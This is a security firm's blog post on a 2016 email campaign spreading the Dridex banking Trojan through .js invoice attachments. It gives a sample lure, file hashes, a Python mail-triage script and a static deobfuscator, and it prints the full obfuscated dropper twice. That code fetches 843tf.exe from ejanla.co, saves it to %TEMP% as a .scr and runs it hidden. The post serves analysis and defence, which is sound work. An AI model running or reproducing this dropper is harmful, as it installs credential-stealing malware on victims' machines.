
Is a huge Global Malware attack pending?


Over the past week we have seen a massive increase in attempted malware attacks via email. Is this linked to the huge increase in malware which Symantec saw throughout January 2016? If the malware succeeds in infecting your machine it starts attempting to steal banking and other personal information.

What do you need to do to prevent it?

  1. Only open attachments you are expecting to receive, and be especially wary of .js and .scr files
  2. Look out for emails with the subject line "Quick Question"
  3. Keep your anti-virus (AV) up to date
  4. Keep Windows Updates up to date
  5. Immediately delete suspect emails

For the Technical Minded:

We have researched this infection. In most cases the emails look as if they come from legitimate sources and try to get you to open a JavaScript (.js) file attachment.

Example of the email being received:

——————————————————————————————————————————

Date: Thu, 04 Feb 2016 10:52:21 +0300
Subject: “January balance £785”
Attachment: IN161561-201601.js

Hi,

Thank you for your recent payment of £672.

It appears the attached January invoice has been missed off of your payment. Could
you please advise when this will be paid or if there is a query with the invoice?

Regards

Sarah Smith
Assistant Accountant

——————————————————————————————————————————

The file attachments are in formats such as:

IN161561-201601.js
DOC201114-201114-001.js

The JavaScript code inside these files is heavily obfuscated with the aim of hiding what it is attempting to do.

We have deciphered the code and can see what it does: the script creates an MSXML2.XMLHTTP object, downloads an executable (.exe) file called 843tf.exe, writes it with ADODB.Stream into the user's %TEMP% folder under a .scr (screensaver) extension (CDq1BPca.scr in this sample; .scr files are ordinary Windows executables, so the rename changes nothing), and then launches it through WScript.Shell. Bizarrely, when the executable runs the process is tagged with the description "Life predecessors calculators been". We have no idea what this means; any ideas?

Regardless, the executable is downloaded from one of the following URLs:

ejanla.co/43543r34r/
cafecl.1pworks.com/43543r34r/

At the time of writing, this executable has been confirmed as the Dridex banking Trojan. Dridex is a strain of banking malware that has usually been spread via macros in Microsoft Office documents; in this campaign the loader is a JavaScript attachment instead, but the payload is the same. Once a computer has been infected, the Dridex operators can steal banking credentials and other personal information from the system and use them to get at the victim's financial accounts.

Block the infected files to protect your systems!

If you are in charge of any IT systems we strongly recommend you block the scripts and executables which are part of this malware. If you are using Webroot you can create a Global Blacklist and block the following MD5 file hashes (bear in mind that a hash only identifies these exact samples; a repacked build will have a different hash, so treat hash blocking as a stopgap alongside blocking .js and .scr attachments at the mail gateway):

  • BBA6C087E28273F2F951448B4B3387DA   (843tf.exe)
  • 07F2D7759EFFBA3862ED7C05B307D7C0  (.js script)
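The advice above (be wary of .js and .scr attachments, watch for the "Quick Question" subject, block the two MD5 hashes) can also be applied mechanically to mail before it reaches a user. The script below is an added example written for this post; it is not a Priority One tool and has nothing to do with Webroot's blacklist. It parses a raw RFC 822 message, flags attachments by their last extension (so invoice.pdf.js is still caught), looks each attachment's MD5 up in the blocklist, and checks the subject against the lure. The hashes are the two quoted above; the extension list, the addresses and the test message built by build_lure are constructed for the example and are not a real capture.

```python
import hashlib
from email import message_from_bytes, policy
from email.message import EmailMessage

# Indicators quoted in the post (MD5s of the dropper and the .js script).
BAD_MD5 = {
    "bba6c087e28273f2f951448b4b3387da": "843tf.exe",
    "07f2d7759effba3862ed7c05b307d7c0": "Dridex .js downloader",
}
# The two extensions the post warns about plus the payload type it names.
# Assumption: extend this list to taste (.jse, .wsf, .vbs ...).
RISKY_EXT = (".js", ".scr", ".exe")
SUSPECT_SUBJECTS = ("quick question",)


def md5_hex(data: bytes) -> str:
    """MD5 of an attachment body, lower-case hex, for blocklist lookups."""
    return hashlib.md5(data).hexdigest()


def triage(raw: bytes, blacklist=BAD_MD5):
    """Return (severity, reason) findings for one raw message; empty list if clean."""
    msg = message_from_bytes(raw, policy=policy.default)
    findings = []
    subject = str(msg["subject"] or "")
    if any(s in subject.strip().lower() for s in SUSPECT_SUBJECTS):
        findings.append(("medium", f"subject matches campaign lure: {subject!r}"))
    for part in msg.iter_attachments():
        name = part.get_filename() or "<unnamed>"
        data = part.get_payload(decode=True) or b""
        digest = md5_hex(data)
        if digest in blacklist:
            findings.append(("high", f"{name}: MD5 {digest} is a known sample ({blacklist[digest]})"))
        # Judge by the *last* extension: 'invoice.pdf.js' runs as a script.
        if name.lower().endswith(RISKY_EXT):
            findings.append(("high", f"{name}: script/executable attachment"))
    return findings


def build_lure(filename: str, payload: bytes, subject: str) -> bytes:
    """Constructed test message modelled on the lure quoted above (not a real capture)."""
    m = EmailMessage()
    m["From"] = "Sarah Smith <accounts@example.com>"   # constructed sender
    m["To"] = "you@example.net"                        # constructed recipient
    m["Subject"] = subject
    m.set_content("It appears the attached January invoice has been missed off of your payment.")
    m.add_attachment(payload, maintype="application", subtype="javascript", filename=filename)
    return m.as_bytes()


if __name__ == "__main__":
    sample = build_lure("IN161561-201601.js", b"WScript.Echo(1);", "January balance \u00a3785")
    for severity, reason in triage(sample):
        print(severity, reason)
```

Run it against a saved .eml file with `triage(open(path, "rb").read())`. The hash check only matches the exact files the post lists; the extension check is what catches the next repacked build.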

If you need assistance in doing this please do get in touch at [email protected] and I am sure we can help.

Can you solve this puzzle?

The malware code is below. Whilst we have decoded it ourselves, we'd be interested to hear from anyone else who can, and who is interested in a new career opportunity.

aDhwsLnov= this['Ac' + ('9YVPNo', 'SLUpny', 'p9GCkM', 't') + 'iv' + ('Xc91F', 'pGvzE', 'psPf', 'e') + 'X' + ('aKZIB', 'Sh0', '4wV', 'O') + 'b' + ('52oIs', 'e1', 'GqcwG', 'j') + 'ec' + ('Qi6', 'Uurc', 'Eg1z', 't') + ''];var aEWRpjfU4 = new aDhwsLnov('WSc' + ('k9nMe', 'OYieb', 'VJWL23', 'r') + 'i' + ('xL93pp', 'ZH', 'E1Z2Oe', 'p') + 't.' + ('dXRoM', '8IybL', '8jEhm4', 'S') + 'he' + ('3phH', 'hKfv', 'SImK', 'l') + 'l');var aMCQvDP5Q = aEWRpjfU4['Ex' + ('gR5rC', 'zWCRjG', 'LKY3', 'p') + 'a' + ('kcGQ', 'yyXjG', 'QW', 'n') + 'dE' + ('oAUYxw', 'QdpCXo', 'pO0Bu', 'n') + 'vi' + ('3pa', '5hd', 'e9', 'r') + 'o' + ('3pmAed', 'DPL1ua', 'uMklZo', 'n') + 'me' + ('LQr', 'SG7jvb', 'SMX5A', 'n') + 'tS' + ('lDqwtU', 'Ofj', '0tX', 't') + 'ri' + ('WJB427', 'LZ2', '5Ck1Y', 'n') + 'gs']('%T' + ('rmOg', '7tCAq', 'vnc7', 'E') + 'M' + ('eH0', 'JJk', '4lk', 'P') + '%' + ('Pu8DLL', 'enlFQ', '22Xthc', '/') + '') + "CDq1BPca"+'.s' + ('U1Lg', '6A', 'Tq', 'c') + 'r';
var asezTpXpb = new aDhwsLnov('MS' + ('oNN', 'b8h1Z', '3XN', 'X') + 'M' + ('YCA', 'EmaKsL', 'mbwpeU', 'L') + '2' + ('woa', 'p98t7W', 'hVqRO4', '.') + 'X' + ('OGJH3V', 's97', 'bE3lt', 'M') + 'L' + ('BWDyK', 'taMifZ', '4G0', 'H') + 'TT' + ('WZc56', 'gLWCep', 'Qm', 'P') + '');
asezTpXpb['on' + ('FRh', '9wrq', '8rmS', 'r') + 'e' + ('4tsX', 'eTmsi', 'jFgH', 'a') + 'dy' + ('z3oJAP', 'bY', 'xQZSV', 's') + 't' + ('SdzL', '245l', 'l3viD', 'a') + 'te' + ('m9wwk', '8Rk8', 'fB58P', 'c') + 'ha' + ('pHZu3J', '6f8JOO', 'Xk', 'n') + 'ge'] = function() {
if (asezTpXpb['re' + ('L99UUp', '0xlF', 'Lmsf', 'a') + 'd' + ('5wr', 'gf2', 'dnZ', 'y') + 'st' + ('LEl', 'zKczi', 'eLjB', 'a') + 't' + ('1pFyQ', 'O5Vbjj', 'Ov', 'e') + ''] === 4) {
var azgGc5M3S = new aDhwsLnov('AD' + ('C2BPBU', 'QFH', 'Shti', 'O') + 'DB' + ('8PP', 'L0w', 'bl', '.') + 'St' + ('OqK', '1zsWXi', 'FKuWd', 'r') + 'ea' + ('eUI48u', 'Fy', '08o', 'm') + '');
azgGc5M3S['ope' + ('GBJ', 'xG', '9mcD', 'n') + '']();
azgGc5M3S['ty' + ('cFlU', 'uoPaX', 'b6', 'p') + 'e'] = 1;
azgGc5M3S['wr' + ('EHgnQ', '4iXquB', 'V1VAn', 'i') + 'te'](asezTpXpb['Re' + ('f92dgd', 'LeZ', 'VgNL', 's') + 'p' + ('31iyC2', 'EX42', 'oU3yXg', 'o') + 'ns' + ('AAp', '0kPO', 'TG', 'e') + 'B' + ('YHy0bd', 'ffMEaQ', '761', 'o') + 'd' + ('BHgC2', 'q8', '6i', 'y') + '']);
azgGc5M3S['po' + ('u6b', '4rYR5', 'Hh', 's') + 'i' + ('jzvUhM', 'jTXs', '3KQ8Kk', 't') + 'i' + ('2jn1as', 'SK', 'H30c', 'o') + 'n'] = 0;
azgGc5M3S['sa' + ('vBTt3N', 'NDFy', 'Uu1eR2', 'v') + 'e' + ('ch4C', '7Cb6Ub', 'v44zR', 'T') + 'oF' + ('uhVs', 'pu', 'hwPB', 'i') + 'le'](aMCQvDP5Q, 2);
azgGc5M3S['cl' + ('k5MXh', 'Stunxz', 'pakUsf', 'o') + 's' + ('FR4Xn', 'y50dq6', 'on', 'e') + '']();
};
};
try {
aM1lypKX3 = 'Ru' + ('oEoXBO', 'VJ', 'b6eQ', 'n') + '';
asezTpXpb['op' + ('lcmrcA', 'jAhGuy', 'ScWQ', 'e') + 'n']('GET' , 'htt' + ('uzUAO', 'y7zUj', 'mwweP7', 'p') + ':/' + ('B44ug', 'k4', 'iOhSJ', '/') + 'ej' + ('vrN5l', '1H', 'yWtFs', 'a') + 'nl' + ('w4KN', '4R', 'nG9gp1', 'a') + '.c' + ('sLZOS0', 'wys0', 'VZu', 'o') + '/' + ('ff9', '71I', 'bYccV', '4') + '3' + ('G6tz7', '6Fs6To', 'oQ', '5') + '4' + ('5jYdl', '0wFdI', 'kniq', '3') + 'r3' + ('xQXdj4', 'Ha', 'xk9D', '4') + 'r/' + ('QYO', 'vt4d4o', 'mPtem', '8') + '4' + ('zDg', 'lqcSL', 'wpt', '3') + 't' + ('heTL', '7PI', 'cxbqU', 'f') + '.e' + ('u9Tbu', 'nn5', 'TvdhT', 'x') + 'e', false);
asezTpXpb['sen' + ('hPT7xC', '5OK', 'knuugF', 'd') + '']();
aEWRpjfU4 [aM1lypKX3](aMCQvDP5Q, 1-1, 1-1);
} catch (aGPs04n4x) {};
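To show what the obfuscation above actually does (and to back the description of the download-and-run chain given earlier), here is a small static deobfuscator. It is an added example written for this post, not the malware and not a tool of Priority One's; it never executes the script. The trick in this sample is the JScript comma operator: ('9YVPNo', 'SLUpny', 'p9GCkM', 't') evaluates every operand and yields the last one, so each four-item list is a single character with three decoys. Undo that, fold the adjacent string literals, turn obj['name'] back into obj.name, substitute the one string constant used as a method name, resolve the ActiveXObject alias and fold 1-1, and the dropper reads as plain WSH code. SAMPLE is the posted script copied verbatim; the regular expressions assume this sample's dialect (single- or double-quoted literals with no escapes, and no literal that begins with a plus sign), which is an assumption, not a general JavaScript parser.

```python
import re

# The page's posted sample, copied verbatim (nothing in it is constructed).
SAMPLE = r"""aDhwsLnov= this['Ac' + ('9YVPNo', 'SLUpny', 'p9GCkM', 't') + 'iv' + ('Xc91F', 'pGvzE', 'psPf', 'e') + 'X' + ('aKZIB', 'Sh0', '4wV', 'O') + 'b' + ('52oIs', 'e1', 'GqcwG', 'j') + 'ec' + ('Qi6', 'Uurc', 'Eg1z', 't') + ''];var aEWRpjfU4 = new aDhwsLnov('WSc' + ('k9nMe', 'OYieb', 'VJWL23', 'r') + 'i' + ('xL93pp', 'ZH', 'E1Z2Oe', 'p') + 't.' + ('dXRoM', '8IybL', '8jEhm4', 'S') + 'he' + ('3phH', 'hKfv', 'SImK', 'l') + 'l');var aMCQvDP5Q = aEWRpjfU4['Ex' + ('gR5rC', 'zWCRjG', 'LKY3', 'p') + 'a' + ('kcGQ', 'yyXjG', 'QW', 'n') + 'dE' + ('oAUYxw', 'QdpCXo', 'pO0Bu', 'n') + 'vi' + ('3pa', '5hd', 'e9', 'r') + 'o' + ('3pmAed', 'DPL1ua', 'uMklZo', 'n') + 'me' + ('LQr', 'SG7jvb', 'SMX5A', 'n') + 'tS' + ('lDqwtU', 'Ofj', '0tX', 't') + 'ri' + ('WJB427', 'LZ2', '5Ck1Y', 'n') + 'gs']('%T' + ('rmOg', '7tCAq', 'vnc7', 'E') + 'M' + ('eH0', 'JJk', '4lk', 'P') + '%' + ('Pu8DLL', 'enlFQ', '22Xthc', '/') + '') + "CDq1BPca"+'.s' + ('U1Lg', '6A', 'Tq', 'c') + 'r';
var asezTpXpb = new aDhwsLnov('MS' + ('oNN', 'b8h1Z', '3XN', 'X') + 'M' + ('YCA', 'EmaKsL', 'mbwpeU', 'L') + '2' + ('woa', 'p98t7W', 'hVqRO4', '.') + 'X' + ('OGJH3V', 's97', 'bE3lt', 'M') + 'L' + ('BWDyK', 'taMifZ', '4G0', 'H') + 'TT' + ('WZc56', 'gLWCep', 'Qm', 'P') + '');
asezTpXpb['on' + ('FRh', '9wrq', '8rmS', 'r') + 'e' + ('4tsX', 'eTmsi', 'jFgH', 'a') + 'dy' + ('z3oJAP', 'bY', 'xQZSV', 's') + 't' + ('SdzL', '245l', 'l3viD', 'a') + 'te' + ('m9wwk', '8Rk8', 'fB58P', 'c') + 'ha' + ('pHZu3J', '6f8JOO', 'Xk', 'n') + 'ge'] = function() {
if (asezTpXpb['re' + ('L99UUp', '0xlF', 'Lmsf', 'a') + 'd' + ('5wr', 'gf2', 'dnZ', 'y') + 'st' + ('LEl', 'zKczi', 'eLjB', 'a') + 't' + ('1pFyQ', 'O5Vbjj', 'Ov', 'e') + ''] === 4) {
var azgGc5M3S = new aDhwsLnov('AD' + ('C2BPBU', 'QFH', 'Shti', 'O') + 'DB' + ('8PP', 'L0w', 'bl', '.') + 'St' + ('OqK', '1zsWXi', 'FKuWd', 'r') + 'ea' + ('eUI48u', 'Fy', '08o', 'm') + '');
azgGc5M3S['ope' + ('GBJ', 'xG', '9mcD', 'n') + '']();
azgGc5M3S['ty' + ('cFlU', 'uoPaX', 'b6', 'p') + 'e'] = 1;
azgGc5M3S['wr' + ('EHgnQ', '4iXquB', 'V1VAn', 'i') + 'te'](asezTpXpb['Re' + ('f92dgd', 'LeZ', 'VgNL', 's') + 'p' + ('31iyC2', 'EX42', 'oU3yXg', 'o') + 'ns' + ('AAp', '0kPO', 'TG', 'e') + 'B' + ('YHy0bd', 'ffMEaQ', '761', 'o') + 'd' + ('BHgC2', 'q8', '6i', 'y') + '']);
azgGc5M3S['po' + ('u6b', '4rYR5', 'Hh', 's') + 'i' + ('jzvUhM', 'jTXs', '3KQ8Kk', 't') + 'i' + ('2jn1as', 'SK', 'H30c', 'o') + 'n'] = 0;
azgGc5M3S['sa' + ('vBTt3N', 'NDFy', 'Uu1eR2', 'v') + 'e' + ('ch4C', '7Cb6Ub', 'v44zR', 'T') + 'oF' + ('uhVs', 'pu', 'hwPB', 'i') + 'le'](aMCQvDP5Q, 2);
azgGc5M3S['cl' + ('k5MXh', 'Stunxz', 'pakUsf', 'o') + 's' + ('FR4Xn', 'y50dq6', 'on', 'e') + '']();
};
};
try {
aM1lypKX3 = 'Ru' + ('oEoXBO', 'VJ', 'b6eQ', 'n') + '';
asezTpXpb['op' + ('lcmrcA', 'jAhGuy', 'ScWQ', 'e') + 'n']('GET' , 'htt' + ('uzUAO', 'y7zUj', 'mwweP7', 'p') + ':/' + ('B44ug', 'k4', 'iOhSJ', '/') + 'ej' + ('vrN5l', '1H', 'yWtFs', 'a') + 'nl' + ('w4KN', '4R', 'nG9gp1', 'a') + '.c' + ('sLZOS0', 'wys0', 'VZu', 'o') + '/' + ('ff9', '71I', 'bYccV', '4') + '3' + ('G6tz7', '6Fs6To', 'oQ', '5') + '4' + ('5jYdl', '0wFdI', 'kniq', '3') + 'r3' + ('xQXdj4', 'Ha', 'xk9D', '4') + 'r/' + ('QYO', 'vt4d4o', 'mPtem', '8') + '4' + ('zDg', 'lqcSL', 'wpt', '3') + 't' + ('heTL', '7PI', 'cxbqU', 'f') + '.e' + ('u9Tbu', 'nn5', 'TvdhT', 'x') + 'e', false);
asezTpXpb['sen' + ('hPT7xC', '5OK', 'knuugF', 'd') + '']();
aEWRpjfU4 [aM1lypKX3](aMCQvDP5Q, 1-1, 1-1);
} catch (aGPs04n4x) {};"""

# 1. ('junk', 'junk', 'junk', 'x') -> 'x': the comma operator yields its last operand.
COMMA_LIST = re.compile(r"\(\s*(?:'[^'\\]*'\s*,\s*)+'([^'\\]*)'\s*\)")
# 2. 'ab' + "c" -> 'abc' for adjacent literals. Assumption: no escapes, and no
#    literal starts with '+', so a match can only begin at an opening quote.
FOLD = re.compile(r"""(['"])([^'"\\]*)\1\s*\+\s*(['"])([^'"\\]*)\3""")
# 3. obj['name'] -> obj.name when the key is a plain identifier.
BRACKET = re.compile(r"""\[(['"])([A-Za-z_$][\w$]*)\1\]""")
# 4. x = 'Name'; obj[x](...) -> obj.Name(...): a string constant used as a method name.
CONST = re.compile(r"^\s*(?:var\s+)?([A-Za-z_$][\w$]*)\s*=\s*'([A-Za-z_$][\w$]*)'\s*;", re.M)
# 5. x = this.ActiveXObject; new x(...) -> new ActiveXObject(...).
ALIAS = re.compile(r"^\s*(?:var\s+)?([A-Za-z_$][\w$]*)\s*=\s*this\.([A-Za-z_$][\w$]*)\s*;", re.M)
# 6. 1-1 -> 0 for integer literals in an argument position (heuristic, not a parser).
ARITH = re.compile(r"(?<=[(,\s])(\d+)\s*-\s*(\d+)(?=\s*[,)])")


def deobfuscate(src: str) -> str:
    """Rewrite the script into readable form without running any of it."""
    s = COMMA_LIST.sub(r"'\1'", src)
    while True:                                   # fold until no 'a' + 'b' pair is left
        folded = FOLD.sub(r"'\2\4'", s)
        if folded == s:
            break
        s = folded
    s = BRACKET.sub(r".\2", s)
    for name, value in CONST.findall(s):
        s = re.sub(r"\s*\[" + re.escape(name) + r"\]", "." + value, s)
    for name, prop in ALIAS.findall(s):
        s = re.sub(r"\bnew\s+" + re.escape(name) + r"\s*\(", "new " + prop + "(", s)
    s = ARITH.sub(lambda m: str(int(m.group(1)) - int(m.group(2))), s)
    return re.sub(r";(?=\S)", ";\n", s)            # one statement per line


def summarize(src: str) -> dict:
    """Pull the indicators an analyst wants (COM objects, URLs, dropped file) from the cleaned script."""
    clean = deobfuscate(src)
    return {
        "progids": re.findall(r"new ActiveXObject\('([^']+)'\)", clean),
        "urls": re.findall(r"'(https?://[^']+)'", clean),
        "files": re.findall(r"'([\w-]+\.(?:scr|exe|dll|bat|vbs|js))'", clean),
    }


if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
    print(summarize(SAMPLE))
```

The cleaned output is the chain described above: new ActiveXObject('MSXML2.XMLHTTP') fetches http://ejanla.co/43543r34r/843tf.exe, ADODB.Stream writes the body to %TEMP%/CDq1BPca.scr, and WScript.Shell's Run starts it with a hidden window (the 0, 0 arguments). Doing this statically, rather than pasting the sample into a sandboxed interpreter, means a mistake in the tooling costs nothing.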

Priority One – IT Security Services in London


Ashley Brown

As one of our senior technicians, Ashley's knowledge of key technologies and products makes him an experienced escalation lead and authority on key areas such as cloud storage.
